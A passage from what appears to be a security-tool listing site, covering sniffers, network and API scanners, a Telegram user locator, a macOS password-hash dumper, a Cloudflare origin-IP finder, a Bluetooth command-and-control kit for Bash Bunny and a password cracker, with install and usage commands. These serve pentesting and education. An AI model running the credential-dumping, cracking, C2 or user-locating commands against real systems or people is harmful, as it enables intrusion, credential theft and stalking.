HTTP Response:
Status Code: b'302'
Content Type: b'text/html; charset=UTF-8'
--------------------------------------------------
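
The sniffing shown above can be sketched in a few lines with Scapy (an illustration under the assumption of a Scapy-based approach, not necessarily PacketSpy's exact code; requires root):

# Sketch: print the request/response line and headers of plain HTTP.
from scapy.all import IP, Raw, sniff

def show_http(pkt):
    if IP in pkt and Raw in pkt:
        payload = bytes(pkt[Raw].load)
        if payload.startswith((b"GET ", b"POST ", b"HTTP/")):
            print(f"{pkt[IP].src} -> {pkt[IP].dst}")
            print(payload.split(b"\r\n\r\n")[0].decode(errors="replace"))

sniff(iface="eth0", filter="tcp port 80", prn=show_http, store=0)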

Footnote

HTTPS support is still a work in progress.

Contributing

Contributions are welcome! To contribute to PacketSpy, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:

License

PacketSpy is released under the MIT License. See LICENSE for more information.



Telegram-Nearby-Map - Discover The Location Of Nearby Telegram Users

By: Zion3R


Telegram Nearby Map uses OpenStreetMap and the official Telegram library to find the position of nearby users.

Please note: Telegram's API was updated a while ago to make nearby user distances less precise, preventing exact location calculations. Therefore, Telegram Nearby Map displays users nearby, but does not show their exact location.

Inspired by Ahmed's blog post and a Hacker News discussion. Developed by github.com/tejado.


How does it work?

Every 25 seconds, all nearby users are fetched from Telegram with TDLib. This includes each nearby user's distance to "my" location. With three distances from three different points, it is possible to calculate the position of the nearby user.

This only finds Telegram users who have activated the nearby feature, which is deactivated by default.
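
For intuition, the trilateration step described above can be sketched in a few lines of Python (an illustration only; the project itself is written in Node.js). Subtracting the circle equation at the first point from the other two leaves a 2x2 linear system in the unknown coordinates:

# Sketch: solve for (x, y) given three points and the distances to them.
import numpy as np

def trilaterate(p1, p2, p3, d1, d2, d3):
    (x1, y1), (x2, y2), (x3, y3) = p1, p2, p3
    A = np.array([[2 * (x2 - x1), 2 * (y2 - y1)],
                  [2 * (x3 - x1), 2 * (y3 - y1)]])
    b = np.array([d1**2 - d2**2 + x2**2 - x1**2 + y2**2 - y1**2,
                  d1**2 - d3**2 + x3**2 - x1**2 + y3**2 - y1**2])
    return np.linalg.solve(A, b)

# Three observation points, each ~70.7 m from the target:
print(trilaterate((0, 0), (100, 0), (0, 100), 70.7, 70.7, 70.7))  # ~[50, 50]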

Installation

Requirements: node.js and a Telegram account

  1. Create an API key for your Telegram account here
  2. Download the repository
  3. Create config.js (see config.example.js) and put your Telegram API credentials in it
  4. Install all dependencies: npm install
  5. Start the app: npm start
  6. Look carefully at the output: you will need to confirm your Telegram login
  7. Go to http://localhost:3000 and have fun

Changelog

2023-09-23

  • Switched to prebuild-tdlib
  • Updated all dependencies
  • Bugfix of the search distance field

2021-11-13

  • Added tdlib.native for Linux (now it works in GitHub Codespaces)
  • Updated all dependencies
  • Bugfixes


Faraday 5.0.0

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

By: Zion3R


APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


Features

  • Flexible Input: Accepts a single domain or a list of subdomains from a file.
  • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
  • Concurrency: Utilizes multi-threading for faster scanning.
  • Customizable Output: Save results to a file or print to stdout.
  • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
  • Custom User-Agent: Ability to specify a custom User-Agent for requests.
  • Smart Detection of False-Positives: Ability to detect most false-positives.

Getting Started

Prerequisites

Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

Installation

Clone the APIDetector repository to your local machine using:

git clone https://github.com/brinhosa/apidetector.git
cd apidetector
pip install requests

Usage

Run APIDetector using the command line. Here are some usage examples:

  • Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:

    python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
  • To scan a single domain:

    python apidetector.py -d example.com
  • To scan multiple domains from a file:

    python apidetector.py -i input_file.txt
  • To specify an output file:

    python apidetector.py -i input_file.txt -o output_file.txt
  • To use a specific number of threads:

    python apidetector.py -i input_file.txt -t 20
  • To scan with both HTTP and HTTPS protocols:

    python apidetector.py -m -d example.com
  • To run the script in quiet mode (suppress verbose output):

    python apidetector.py -q -d example.com
  • To run the script with a custom user-agent:

    python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

Options

  • -d, --domain: Single domain to test.
  • -i, --input: Input file containing subdomains to test.
  • -o, --output: Output file to write valid URLs to.
  • -t, --threads: Number of threads to use for scanning (default is 10).
  • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
  • -q, --quiet: Disable verbose output (default mode is verbose).
  • -ua, --user-agent: Custom User-Agent string for requests.
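
To illustrate the core idea behind these options, here is a minimal sketch of probing a few common Swagger paths concurrently (an illustration, not APIDetector's code; the paths are a small sample from the risk list below, and a 200 response alone is a crude signal that APIDetector refines with its false-positive checks):

# Sketch: probe common Swagger/OpenAPI paths over HTTPS with a thread pool.
from concurrent.futures import ThreadPoolExecutor
import requests

PATHS = ["/swagger-ui.html", "/openapi.json", "/v2/api-docs", "/v3/api-docs"]

def probe(domain, path):
    url = f"https://{domain}{path}"
    try:
        r = requests.get(url, timeout=5, allow_redirects=False)
        return url if r.status_code == 200 else None
    except requests.RequestException:
        return None

with ThreadPoolExecutor(max_workers=10) as pool:
    for hit in pool.map(lambda p: probe("example.com", p), PATHS):
        if hit:
            print("possibly exposed:", hit)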

RISK DETAILS OF EACH ENDPOINT APIDETECTOR FINDS

Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list of the endpoints APIDetector scans, grouped by similarity and ranked by potential risk level:

1. High-Risk Endpoints (Direct API Documentation):

  • Endpoints:
    • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
  • Risk:
    • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
    • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

2. Medium-High Risk Endpoints (API Schema/Specification):

  • Endpoints:
    • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
  • Risk:
    • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
    • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

3. Medium Risk Endpoints (API Documentation Versions):

  • Endpoints:
    • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
  • Risk:
    • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
    • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

4. Lower Risk Endpoints (Configuration and Resources):

  • Endpoints:
    • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
  • Risk:
    • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
    • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

Summary:

  • Highest Risk: Directly exposing interactive API documentation interfaces.
  • Medium-High Risk: Exposing raw API schema/specification files.
  • Medium Risk: Version-specific API documentation.
  • Lower Risk: Configuration and resource files for API documentation.

Recommendations:

  • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
  • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
  • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

Contributing

Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

Legal Disclaimer

The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

License

This project is licensed under the MIT License.

Acknowledgments



Osx-Password-Dumper - A Tool To Dump Users' .Plist Files On A macOS System And Convert Them Into A Crackable Hash

By: Zion3R


OSX Password Dumper Script

Overview

A bash script to retrieve users' .plist files on a macOS system and convert the data inside them to a crackable hash format (for use with John the Ripper or Hashcat).

Useful for CTFs/Pentesting/Red Teaming on macOS systems.


Prerequisites

  • The script must be run as a root user (sudo)
  • macOS environment (tested on a macOS VM Ventura beta 13.0 (22A5266r))

Usage

sudo ./osx_password_cracker.sh OUTPUT_FILE /path/to/save/.plist


NetProbe - Network Probe

By: Zion3R


NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to every IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
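
The ARP sweep described above can be sketched with Scapy as follows (illustrative only, not NetProbe's actual implementation; requires root):

# Sketch: broadcast who-has requests for every address in a CIDR block
# and collect the (IP, MAC) pairs that answer.
from scapy.all import ARP, Ether, srp

def arp_scan(cidr, iface=None, timeout=2):
    pkt = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=cidr)
    answered, _ = srp(pkt, timeout=timeout, iface=iface, verbose=False)
    return [(rcv.psrc, rcv.hwsrc) for _, rcv in answered]

for ip, mac in arp_scan("192.168.1.0/24", iface="eth0"):
    print(ip, mac)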

Features

  • Scan for devices on a specified IP address or subnet
  • Display the IP address, MAC address, manufacturer, and device model of discovered devices
  • Live tracking of devices (optional)
  • Save scan results to a file (optional)
  • Filter by manufacturer (e.g., 'Apple') (optional)
  • Filter by IP range (e.g., '192.168.1.0/24') (optional)
  • Scan rate in seconds (default: 5) (optional)

Download

You can download the program from the GitHub page.

$ git clone https://github.com/HalilDeniz/NetProbe.git

Installation

To install the required libraries, run the following command:

$ pip install -r requirements.txt

Usage

To run the program, use the following command:

$ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
  • -h,--help: show this help message and exit
  • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
  • -i,--interface: Interface to use (default: None)
  • -l,--live: Enable live tracking of devices
  • -o,--output: Output file to save the results
  • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
  • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
  • -s,--scan-rate: Scan rate in seconds (default: 5)

Example:

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

Help Menu

$ python3 netprobe.py --help                      
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

NetProbe: Network Scanner Tool

options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)

Default Scan

$ python3 netprobe.py 

Live Tracking

You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

Save Results

You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 192.168.1.1  β”‚ **:6e:**:97:**:28 β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.3  β”‚ 00:**:22:**:12:** β”‚ 102         β”‚ InPro Comm                   β”‚
β”‚ 192.168.1.2  β”‚ **:32:**:bf:**:00 β”‚ 102         β”‚ Xiaomi Communications Co Ltd β”‚
β”‚ 192.168.1.98 β”‚ d4:**:64:**:5c:** β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.25 β”‚ **:49:**:00:**:38 β”‚ 102         β”‚ Unknown                      β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Contact

If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

License

This program is released under the MIT LICENSE. See LICENSE for more information.



TOR Virtual Network Tunneling Tool 0.4.8.10

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs). This is the source code release.

Douglas-042 - Powershell Script To Help Speed ​​Up Threat Hunting Incident Response Processes

By: Zion3R


DOUGLAS-042 stands as an ingenious embodiment of a PowerShell script meticulously designed to expedite the triage process and facilitate the meticulous collection of crucial evidence derived from both forensic artifacts and the ephemeral landscape of volatile data. Its fundamental mission revolves around providing indispensable aid in the arduous task of pinpointing potential security breaches within Windows ecosystems. With an overarching focus on expediency, DOUGLAS-042 orchestrates the efficient prioritization and methodical aggregation of data, ensuring that no vital piece of information eludes scrutiny when investigating a possible compromise. As a testament to its organized approach, the amalgamated data finds its sanctuary within the confines of a meticulously named text file, bearing the nomenclature of the host system's very own hostname. This practice of meticulous data archival emerges not just as a systematic convention, but as a cornerstone that paves the way for seamless transitions into subsequent stages of the Forensic journey.


Content Queries

  • General information
  • Account and group information
  • Network
  • Process Information
  • OS Build and HOTFIXES
  • Persistence
  • HARDWARE Information
  • Encryption information
  • FIREWALL INFORMATION
  • Services
  • History
  • SMB Queries
  • Remoting queries
  • REGISTRY Analysis
  • LOG queries
  • Installation of Software
  • User activity

Advanced Queries

  • Prefetch file information
  • DLL List
  • WMI filters and consumers
  • Named pipes

Usage

Using administrative privileges, just run the script from a PowerShell console; the results will be saved in the current directory as a .txt file.

$ PS >./douglas.ps1

Advanced usage

$ PS >./douglas.ps1 -a


Video




Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

By: Zion3R


py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.


Installation

  • Via pip

    pip install pyamsi
  • Clone repository

    git clone https://github.com/Tomiwa-Ot/py-amsi.git
    cd py-amsi/
    python setup.py install

Usage

from pyamsi import Amsi

# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
Risk Level   Meaning
0            AMSI_RESULT_CLEAN (File is clean)
1            AMSI_RESULT_NOT_DETECTED (No threat detected)
16384        AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
20479        AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
32768        AMSI_RESULT_DETECTED (File is considered malware)

Docs

https://tomiwa-ot.github.io/py-amsi/index.html



AcuAutomate - Unofficial Acunetix CLI Tool For Automated Pentesting And Bug Hunting Across Large Scopes

By: Zion3R


AcuAutomate is an unofficial Acunetix CLI tool that simplifies automated pentesting and bug hunting across extensive targets. It's a valuable aid during large-scale pentests, enabling the easy launch or stoppage of multiple Acunetix scans simultaneously. Additionally, its versatile functionality seamlessly integrates into enumeration wrappers or one-liners, offering efficient control through its pipeline capabilities.


Installation

git clone https://github.com/danialhalo/AcuAutomate.git
cd AcuAutomate
chmod +x AcuAutomate.py
pip3 install -r requirements.txt

Configuration (config.json)

Before using AcuAutomate, you need to set up the configuration file config.json inside the AcuAutomate folder:

{
"url": "https://localhost",
"port": 3443,
"api_key": "API_KEY"
}
  • The url and port parameters are set to the default Acunetix settings; however, these can be changed depending on your Acunetix configuration.
  • Replace API_KEY with your Acunetix API key. The key can be obtained from the user profile page at https://localhost:3443/#/profile
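
For context, launching a scan through the Acunetix REST API boils down to registering a target and then starting a scan against it. The sketch below follows the commonly documented v1 endpoints and the stock "Full Scan" profile ID; verify these details against your Acunetix version before relying on them:

# Sketch of a direct Acunetix v1 API scan launch (verify locally).
import requests

API = "https://localhost:3443/api/v1"          # url/port from config.json
HEADERS = {"X-Auth": "API_KEY", "Content-Type": "application/json"}

# 1. Register the target.
r = requests.post(f"{API}/targets", headers=HEADERS, verify=False,
                  json={"address": "https://www.google.com",
                        "description": "AcuAutomate example"})
target_id = r.json()["target_id"]

# 2. Launch a scan ("Full Scan" profile ID in stock installs).
requests.post(f"{API}/scans", headers=HEADERS, verify=False,
              json={"target_id": target_id,
                    "profile_id": "11111111-1111-1111-1111-111111111111",
                    "schedule": {"disable": False, "start_date": None,
                                 "time_sensitive": False}})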

Usage

The help parameter (-h) can be used for accessing more detailed help for specific actions

    		                               __  _                 ___
____ ________ ______ ___ / /_(_) __ _____/ (_)
/ __ `/ ___/ / / / __ \/ _ \/ __/ / |/_/_____/ ___/ / /
/ /_/ / /__/ /_/ / / / / __/ /_/ /> </_____/ /__/ / /
\__,_/\___/\__,_/_/ /_/\___/\__/_/_/|_| \___/_/_/

-: By Danial Halo :-


usage: AcuAutomate.py [-h] {scan,stop} ...

Launch or stop a scan using Acunetix API

positional arguments:
{scan,stop} Action to perform
scan Launch a scan use scan -h
stop Stop a scan

options:
-h, --help show this help message and exit

Scan Actions

To launch a scan, you need to use the scan action:

xubuntu:~/AcuAutomate$ ./AcuAutomate.py scan -h

usage: AcuAutomate.py scan [-h] [-p] [-d DOMAIN] [-f FILE]
[-t {full,high,weak,crawl,xss,sql}]

options:
-h, --help show this help message and exit
-p, --pipe Read from pipe
-d DOMAIN, --domain DOMAIN
Domain to scan
-f FILE, --file FILE File containing list of URLs to scan
-t {full,high,weak,crawl,xss,sql}, --type {full,high,weak,crawl,xss,sql}
High Risk Vulnerabilities Scan, Weak Password Scan, Crawl Only,
XSS Scan, SQL Injection Scan, Full Scan (by default)

Scanning Single Target

The domain can be provided with the -d flag for a single-site scan:

./AcuAutomate.py scan -d https://www.google.com

Scanning Multiple Targets

To scan multiple domains, add the domains to a file, then specify the file name with the -f flag:

./AcuAutomate.py scan -f domains.txt

Pipeline

AcuAutomate can also work with pipeline input via the -p flag:

cat domain.txt | ./AcuAutomate.py scan -p

This is great, as it enables AcuAutomate to work with other tools. For example, we can use subfinder and httpx, then pipe the output to AcuAutomate for mass scanning with Acunetix:

subfinder -silent -d google.com | httpx -silent | ./AcuAutomate.py scan -p

Scan Type

The -t flag can be used to define the scan type. For example, the following scan will only detect SQL injection vulnerabilities:

./AcuAutomate.py scan -d https://www.google.com -t sql

Note

AcuAutomate only accepts domains prefixed with http:// or https://

Stop Action

The stop action can be used to stop scans, either with the -d flag to stop the scan for a specific domain or with the -a flag to stop all running scans.

xubuntu:~/AcuAutomate$ ./AcuAutomate.py stop -h


__ _ ___
____ ________ ______ ___ / /_(_) __ _____/ (_)
/ __ `/ ___/ / / / __ \/ _ \/ __/ / |/_/_____/ ___/ / /
/ /_/ / /__/ /_/ / / / / __/ /_/ /> </_____/ /__/ / /
\__,_/\___/\__,_/_/ /_/\___/\__/_/_/|_| \___/_/_/

-: By Danial Halo :-


usage: AcuAutomate.py stop [-h] [-d DOMAIN] [-a]

options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Domain of the scan to stop
-a, --all Stop all Running Scans

Contact

Please submit any bugs, issues, questions, or feature requests under "Issues" or send them to me on Twitter. @DanialHalo



CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

By: Zion3R


CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


Key Features:

  • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

  • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

  • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

  • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
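
A stripped-down sketch of the underlying idea (illustrative only, not CloakQuest3r's code): resolve candidate subdomains and flag any IP that falls outside Cloudflare's published ranges as a possible origin server. The ranges below are a small excerpt and may change; fetch the current list from Cloudflare for real use:

# Sketch: flag resolved subdomain IPs that are not in Cloudflare ranges.
import ipaddress
import socket

CLOUDFLARE_NETS = [ipaddress.ip_network(n) for n in
                   ("104.16.0.0/13", "172.64.0.0/13", "173.245.48.0/20")]

def behind_cloudflare(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_NETS)

for sub in ("www", "mail", "dev", "staging"):
    host = f"{sub}.example.com"
    try:
        ip = socket.gethostbyname(host)
    except socket.gaierror:
        continue  # subdomain does not resolve
    tag = "cloudflare" if behind_cloudflare(ip) else "possible real IP"
    print(f"{host:<24} {ip:<16} {tag}")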

Limitation

- Still in the development phase; sometimes it can't detect the real IP.

- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

1. False Negatives: CloakQuest3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare.

This tool is a Proof of Concept and is for Educational Purposes Only.

How to Use:

  1. Run CloakQuest3r with a single command-line argument: the target domain you want to analyze.

     git clone https://github.com/spyboy-productions/CloakQuest3r.git
    cd CloakQuest3r
    pip3 install -r requirements.txt
    python cloakquest3r.py example.com
  2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

  3. If Cloudflare is detected, CloakQuest3r will scan for subdomains and identify their real IP addresses.

  4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

  5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

CloakQuest3r simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

Run It Online:

Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



BlueBunny - BLE Based C2 For Hak5's Bash Bunny

By: Zion3R


C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
Send your Bash Bunny all the instructions it needs just over the air.

Overview

Structure


Installation & Start

  1. Install required dependencies
pip install pygatt "pygatt[GATTTOOL]"

Make sure BlueZ is installed and gatttool is usable

sudo apt install bluez
  2. Download BlueBunny's repository (and switch into the correct folder)
git clone https://github.com/90N45-d3v/BlueBunny
cd BlueBunny/C2
  3. Start the C2 server
sudo python c2-server.py
  4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: BlueBunny/payload.txt).
  5. Visit your C2 server from your browser on localhost:1472 and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).

Manual communication with the Bash Bunny through Python

You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.

Example Code

# Import the backend (BlueBunny/C2/BunnyLE.py)
import BunnyLE

# Define the data to send
data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
d_type = "cmd"

# Initialize BunnyLE
BunnyLE.init()

# Connect to your Bash Bunny
bb = BunnyLE.connect()

# Send the data and let it execute
BunnyLE.send(bb, data, d_type)

Troubleshooting

Connecting your Bash Bunny doesn't work? Try the following instructions:

  • Try connecting a few more times
  • Check if your bluetooth adapter is available
  • Restart the system your C2 server is running on
  • Check if your Bash Bunny is running the BlueBunny payload properly
  • How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?

Bugs within BlueZ

The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kinds of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised if they show up.

  • Timeout after 5.0 seconds
  • Unknown error while scanning for BLE devices

Working on...

  • Remote shell access
  • BLE exfiltration channel
  • Improved connecting process

Additional information

As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.



Kali Linux 2023.4 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R

Time for another Kali Linux release! – Kali Linux 2023.4. This release has various impressive updates.


The summary of the changelog since the 2023.3 release from August is:

PassBreaker - Command-line Password Cracking Tool Developed In Python

By: Zion3R


PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute-force attacks.

Features

  • Wordlist-based password cracking
  • Brute force password cracking
  • Support for multiple hash algorithms
  • Optional salt value
  • Parallel processing option for faster cracking
  • Password complexity evaluation
  • Customizable minimum and maximum password length
  • Customizable character set for brute force attacks

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PassBreaker.git
  2. Install the required dependencies:

    pip install -r requirements.txt

Usage

python passbreaker.py <password_hash> <wordlist_file> [--algorithm]

Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.

Options

  • --algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
  • -s, --salt <salt>: Specify a salt value to use.
  • -p, --parallel: Enable parallel processing for faster cracking.
  • -c, --complexity: Evaluate password complexity before cracking.
  • -b, --brute-force: Perform a brute force attack.
  • --min-length <min_length>: Set the minimum password length for brute force attacks.
  • --max-length <max_length>: Set the maximum password length for brute force attacks.
  • --character-set <character_set>: Set the character set to use for brute force attacks.


Usage Examples

Wordlist-based Password Cracking

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5

This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.
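
Under the hood, a wordlist attack boils down to hashing each candidate and comparing it with the target. A minimal, self-contained Python sketch of the idea (not PassBreaker's actual code):

import hashlib

target = "5f4dcc3b5aa765d61d8327deb882cf99"  # MD5 of "password"
with open("passwords.txt", encoding="utf-8", errors="ignore") as wordlist:
    for line in wordlist:
        candidate = line.strip()
        if hashlib.md5(candidate.encode()).hexdigest() == target:
            print(f"Match found: {candidate}")
            break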

